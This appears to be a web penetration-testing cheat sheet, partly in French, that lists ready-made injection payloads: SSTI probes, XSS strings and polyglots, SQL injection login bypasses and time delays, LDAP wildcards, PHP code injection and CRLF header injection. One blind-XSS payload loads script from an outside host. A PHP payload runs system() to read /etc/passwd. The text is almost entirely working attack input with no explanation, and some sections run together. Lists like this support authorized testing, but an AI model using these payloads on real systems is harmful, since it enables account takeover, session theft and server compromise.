Cheat sheet
SSTI (Server Side Template Injection)
## 77*77 = 5929
{{77*77}}%20${77*77}%20<%=77*77%>%20${{77*77}}%20#{77*77}%20*{77*77}%20[[77*77]]
${{<%[%'"}}%\.
{{77*77}}
${77*77}
<%= 77*77 %>
${{77*77}}
#{77*77}
*{77*77}
[[77*77]]XSS Cross-Site Scripting
'"><img src=1 onerror=alert((document.domain))>//
'"><xss id=x onfocus=alert((document.domain)) tabindex=1>#x
## XSS entre les balises HTML
<script>alert((document.domain))</script>
<img src=1 onerror=alert((document.domain))>
## XSS dans les attributs de balise HTML
/>"autofocus onfocus=alert((document.domain)) x="
## Entre la balise HTML href
javascript:alert((document.domain))
## XSS en JavaScript
'-alert((document.domain))-'
';alert((document.domain))//-'
\';alert((document.domain))//-'
${alert(document.domain)}
## Bypass email filter
"><svg/onload=confirm(1)>"@gmail.com
## Blind XSS
'"></title></teXtarEa></scRipt></style></noscript><scRipt src=https://abc.xss.ht></scRipt>//
## Polyglots
-->'"/></sCript><svG x=">" onload=((co\u006efirm))``>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert((document.domain))//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert((document.domain))//>
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@1/)//'>
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">SQL Injection
' or 1=1 -- -
admin' --
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
'; WAITFOR DELAY '0:0:10' --
'; SELECT pg_sleep(10) --
'; SELECT SLEEP(10) --+
' dbms_pipe.receive_message(('a'),10) --
## Polyglots
SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
## SQLi / JS inject / html inject / CSTI Injection
'"`><img src=x>${{7*7}}LDAP Injection
*
*)(&
//
@*
|
admin*
admin*)((|password=*)PHP Code Injection
{${sleep(hexdec(dechex(20)))}}
${system($_GET[1])}&1=cat+/etc/passwd
${system(chr(105).chr(100))} // system(idCRLF Injection
%0D%0A
%E5%98%8A%E5%98%8D
%0D%0ASet-Cookie:mycookie=myvalue
%E5%98%8A%E5%98%8DSet-Cookie:mycookie=myvalueLast updated